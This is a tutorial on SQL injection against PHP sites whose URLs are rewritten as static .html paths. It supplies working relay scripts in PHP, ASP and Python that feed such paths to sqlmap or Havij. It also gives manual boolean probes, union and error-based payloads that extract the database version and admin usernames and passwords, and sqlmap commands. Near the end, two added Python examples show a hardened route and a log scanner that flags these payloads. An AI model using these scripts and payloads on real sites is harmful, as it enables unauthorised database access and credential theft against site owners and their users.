Summary of PHP pseudo-static injection [with ASP and Python code]

Source: Internet
Author: User

This article summarizes pseudo-static injection against PHP sites and is shared here for reference. The details are as follows:

I. Relay (Intermediate) Injection Method

1. After pseudo-static rewriting, http://www.xxx.com/news.php?id=1 becomes:
http://www.xxx.com/news.php/id/1.html

2. Test procedure:

PHP code for the relay: inject.php

<?php
// Local relay: takes ?id=... and forwards it inside the pseudo-static path.
set_time_limit(0);
$id = $_GET["id"];
// Encode the characters that cannot appear raw in the path segment.
$id = str_replace(" ", "%20", $id);
$id = str_replace("=", "%3D", $id);
$url = "http://www.xxx.com/news.php/id/$id.html";
// echo $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>

3. Set up PHP in the local environment and access http://127.0.0.1/inject.php?id=1

You can then test the injection through sqlmap or Havij.

Appendix: ASP relay code:

<%
JmdcwName = request("id")
JmStr = JmdcwName
JmStr = URLEncoding(JmStr)
JMUrl = "http://192.168.235.7:8808/ad/blog/" ' URL that is actually requested
JMUrl = JMUrl & JmStr & ".html" ' concatenate the URL
response.write JMUrl & JmStr ' here I intentionally output the URL to look at it
'JmRef = "http://127.0.0.1/6kbbs/bank.asp"
JmCok = ""
JmCok = replace(JmCok, chr(32), "%20")
JmStr = URLEncoding(JmStr)
response.write PostData(JMUrl, JmStr, JmCok, JmRef) ' url, query string, cookie, referer field

Function PostData(PostUrl, PostStr, PostCok, PostRef)
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send ()
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn) ' process the returned information
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

Function URLEncoding(vstrin) ' URL-encode the parameter before sending the request
    strReturn = ""
    Dim I
    'vstrin = Replace(vstrin, "%", "%25") ' add conversion of search characters
    'vstrin = Replace(vstrin, chr(32), "%20") ' converts spaces. If the website filters spaces, try /**/ in place of %20
    'vstrin = Replace(vstrin, chr(43), "%2B") ' JMDCW: add conversion of the + character
    ' Add the characters to be filtered here. This line is very important: for convenience, spaces are replaced with /**/
    vstrin = Replace(vstrin, chr(32), "/**/")
    For I = 1 To Len(vstrin)
        ThisChr = Mid(vstrin, I, 1)
        If Abs(Asc(ThisChr)) < &HFF Then
            strReturn = strReturn & ThisChr
        Else
            InnerCode = Asc(ThisChr)
            If InnerCode < 0 Then
                InnerCode = InnerCode + &H10000
            End If
            Hight1 = (InnerCode And &HFF00) \ &HFF
            Low1 = InnerCode And &HFF
            strReturn = strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End If
    Next
    URLEncoding = strReturn
End Function
%>

II. Manual Injection

1. http://www.xxx.com/play/Diablo.html
http://www.xxx.com/down/html?772.html

2. Test injection:

http://www.xxx.com/down/html?7722.16.html
http://www.xxx.com/play/Diablo'.html
http://www.xxx.com/play/diablo'/**/and/**/1='1/*.html
http://www.xxx.com/play/Diablo'/**/and/**/1='2/*.html
http://www.xxx.com/page/html?56'/**/and/**/1=1/*.html is normal.
http://www.xxx.com/page/html?56'/**/and/**/1=2/*.html Error

3. Check whether the pages differ. If the pages are the same, there is no injection.

4. Union query:

http://www.xxx.com/play/diablo' and 1=2 union select 1,2... from information_schema.columns where 110000'1.html
http://www.xxx.com/page/html?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring(select(version(),1,62))))a/**/from/**/information_schema.tables/**/group/**/by/**/a)B)=1/*.html

Manual injection method (2)

http://www.xxx.net/news/html?410.html
http://www.xxx.net/news/html?410'Union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)B/**/where'1'{'1.html

Note:

Pseudo-static injection is not the same as ordinary GET injection through URL parameters.

In ordinary URL GET injection, %20, %23, + and so on can be used. With pseudo-static URLs they cannot, because they are passed straight through as part of the URL; therefore the '/**/' symbol is used to stand for spaces.
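Why the rewritten URL is still injectable, and what closes it, as an added example that is not part of the original page. The route shape /news.php/id/<id>.html follows section I and the two probes follow step 2 of section II; the table, data and function names are assumptions, and SQLite stands in for the site's PHP/MySQL backend:

```python
import re
import sqlite3

# Constructed sample data; SQLite stands in for the site's MySQL backend.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
db.executemany("INSERT INTO news VALUES (?, ?)", [(1, "Launch"), (2, "Patch notes")])

# The rewrite rule hands whatever sits between /id/ and .html to the handler.
LOOSE_ROUTE = re.compile(r"^/news\.php/id/(.+)\.html$")
# Hardened route: the segment must be 1 to 9 digits and nothing else.
STRICT_ROUTE = re.compile(r"^/news\.php/id/([0-9]{1,9})\.html$")


def vulnerable_handler(path):
    """Trusts the rewritten segment and concatenates it into the query."""
    m = LOOSE_ROUTE.match(path)
    if not m:
        return 404, None
    sql = "SELECT title FROM news WHERE id = " + m.group(1)  # injectable
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return 500, None
    return (200, row[0]) if row else (404, None)


def hardened_handler(path):
    """Allow-lists the segment in the route, then binds it as a parameter."""
    m = STRICT_ROUTE.match(path)
    if not m:
        return 404, None
    row = db.execute("SELECT title FROM news WHERE id = ?",
                     (int(m.group(1)),)).fetchone()
    return (200, row[0]) if row else (404, None)


def pages_differ(handler):
    """Step 3 of section II: compare the responses to the two boolean probes."""
    true_probe = handler("/news.php/id/1/**/and/**/1=1.html")
    false_probe = handler("/news.php/id/1/**/and/**/1=2.html")
    return true_probe != false_probe
```

With the loose route the two probes produce different pages; with the strict route and bound parameter both are rejected identically before any SQL is built.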

III. sqlmap Method

In sqlmap, if the URL is pseudo-static, add * at the injection point:
http://www.cunlide.com/id1/1/id2/2
python sqlmap.py -u "http://www.xxx.com/id1/1*/id2/2"
http://www.xxx.com/news/class?103.htm
python sqlmap.py -u "http://www.xxx.com/news/class?103*.html"

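IV. Python Script Method

Code:

from http.server import BaseHTTPRequestHandler, HTTPServer
import urllib.request
import urllib.error

class MyHTTPHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Everything after "id=" in the local request is appended to the target path.
        path = self.path
        path = path[path.find('id=') + 3:]
        # Upstream requests go through a local HTTP proxy on port 8087.
        proxy_support = urllib.request.ProxyHandler({"http": "http://127.0.0.1:8087"})
        opener = urllib.request.build_opener(proxy_support)
        urllib.request.install_opener(opener)
        url = "http://www.xxx.com/magazine/imedia/gallery/dickinsons-last-dance/"
        try:
            response = urllib.request.urlopen(url + path)
            html = response.read()
        except urllib.error.HTTPError as e:
            # HTTP error responses still carry a body; return it to the caller.
            html = e.read()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(html)

server = HTTPServer(("", 8000), MyHTTPHandler)
server.serve_forever()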
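From the defending side, requests produced by any of the four methods above reach the web server with SQL syntax inside the path or bare query of an .html route, with /**/ where a space would be. The following added example (not part of the original page; the log lines are constructed, and the marker names and scan function are assumptions) flags such requests in a combined-format access log:

```python
import re
from urllib.parse import unquote

# SQL syntax that has no business inside a pseudo-static path segment.
# A lone quote can be a legitimate slug character, so treat single-marker
# hits as leads and multi-marker hits as strong signals.
MARKERS = {
    "inline-comment": re.compile(r"/\*"),
    "quote": re.compile(r"['\"]"),
    "boolean-test": re.compile(r"\b(and|or)\b\W*\d+\W*=", re.I),
    "union-select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I),
    "schema-probe": re.compile(r"information_schema", re.I),
}
REQUEST = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+" (\d{3})')

# Constructed sample log; addresses come from documentation ranges.
SAMPLE_LOG = '''
198.51.100.7 - - [12/Mar/2024:10:01:02 +0000] "GET /play/Diablo.html HTTP/1.1" 200 5120
192.0.2.44 - - [12/Mar/2024:10:01:09 +0000] "GET /play/Diablo'.html HTTP/1.1" 500 312
192.0.2.44 - - [12/Mar/2024:10:01:15 +0000] "GET /page/html?56%27/**/and/**/1=1/*.html HTTP/1.1" 200 4890
192.0.2.44 - - [12/Mar/2024:10:01:16 +0000] "GET /page/html?56%27/**/and/**/1=2/*.html HTTP/1.1" 200 977
198.51.100.7 - - [12/Mar/2024:10:02:40 +0000] "GET /news/html?410.html HTTP/1.1" 200 6031
'''.strip().splitlines()


def scan(lines):
    """Return (client, status, decoded target, marker names) per suspicious request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        # Decode twice so %27 and %2527 are both seen as a quote.
        decoded = unquote(unquote(target))
        found = [name for name, rx in MARKERS.items() if rx.search(decoded)]
        if found:
            hits.append((client, int(status), decoded, found))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Because the payload sits in the path rather than in a named query parameter, rules keyed on parameter names miss it; matching on the whole decoded request target does not.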
